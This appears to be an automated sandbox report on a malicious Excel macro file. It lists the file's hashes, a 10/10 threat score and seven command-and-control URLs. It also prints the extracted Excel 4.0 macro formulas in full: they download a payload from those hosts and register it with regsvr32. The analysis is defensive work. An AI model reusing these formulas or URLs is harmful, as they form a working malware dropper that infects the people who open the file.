Overview

overview

10

Static

static

10

201417f7cb...b.xlsm

windows7-x64

10

201417f7cb...b.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    201417f7cbaa4eaacac2c74854ea2b5a7e683ca636e499bd6cb4895d198176db

  • Size

    74KB

  • Sample

    241120-wvddbs1flr

  • MD5

    7f83c0b2ef2a5dc0300d7eec9b986ddc

  • SHA1

    d6be7205d8e582a8f91d49979a49f9344bb24c0f

  • SHA256

    201417f7cbaa4eaacac2c74854ea2b5a7e683ca636e499bd6cb4895d198176db

  • SHA512

    4835a09656a0498765dd9cfd9e7c9fbbf926495fc6e1ba69106d12739f725f1442aa18619b86f612e1791dcc2c65eb6ef6c68d15799111d598ea3e07811e5d66

  • SSDEEP

    1536:4qSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsM9VIzB3g:43tzSmICpH7OZuvZGsMl

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://part-co.org/wp-admin/u4NPmsvZ3EWBa8tYlZv/

https://protokol.mx/Archivos/HgTqbLkgrgLAvunV/

http://letea.eu/wp-content/CgaqeucmpVT2NEK/

http://ponizinny.nl/wp-admin/KdLO9n/

http://sport-foto.nu/wp-content/Jqf9mfIPcA/

http://www.citybridgesc.at/Ergebnisse/K7mPH42tTl7slZgWH/

http://life.lst.dx.am/img/WNIWv/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://part-co.org/wp-admin/u4NPmsvZ3EWBa8tYlZv/","..\rds.ocx",0,0) =IF('EEGVWE'!E8<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/HgTqbLkgrgLAvunV/","..\rds.ocx",0,0)) =IF('EEGVWE'!E10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://letea.eu/wp-content/CgaqeucmpVT2NEK/","..\rds.ocx",0,0)) =IF('EEGVWE'!E12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ponizinny.nl/wp-admin/KdLO9n/","..\rds.ocx",0,0)) =IF('EEGVWE'!E14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://sport-foto.nu/wp-content/Jqf9mfIPcA/","..\rds.ocx",0,0)) =IF('EEGVWE'!E16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.citybridgesc.at/Ergebnisse/K7mPH42tTl7slZgWH/","..\rds.ocx",0,0)) =IF('EEGVWE'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://life.lst.dx.am/img/WNIWv/","..\rds.ocx",0,0)) =IF('EEGVWE'!E20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rds.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://part-co.org/wp-admin/u4NPmsvZ3EWBa8tYlZv/
xlm40.dropper

https://protokol.mx/Archivos/HgTqbLkgrgLAvunV/
xlm40.dropper

http://letea.eu/wp-content/CgaqeucmpVT2NEK/
xlm40.dropper

http://ponizinny.nl/wp-admin/KdLO9n/
xlm40.dropper

http://sport-foto.nu/wp-content/Jqf9mfIPcA/
xlm40.dropper

http://www.citybridgesc.at/Ergebnisse/K7mPH42tTl7slZgWH/
xlm40.dropper

http://life.lst.dx.am/img/WNIWv/

Targets

    • Target

      201417f7cbaa4eaacac2c74854ea2b5a7e683ca636e499bd6cb4895d198176db

    • Size

      74KB

    • MD5

      7f83c0b2ef2a5dc0300d7eec9b986ddc

    • SHA1

      d6be7205d8e582a8f91d49979a49f9344bb24c0f

    • SHA256

      201417f7cbaa4eaacac2c74854ea2b5a7e683ca636e499bd6cb4895d198176db

    • SHA512

      4835a09656a0498765dd9cfd9e7c9fbbf926495fc6e1ba69106d12739f725f1442aa18619b86f612e1791dcc2c65eb6ef6c68d15799111d598ea3e07811e5d66

    • SSDEEP

      1536:4qSto0NSVUINwtzLT7OMuuAe0yOcfpXZGsM9VIzB3g:43tzSmICpH7OZuvZGsMl

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks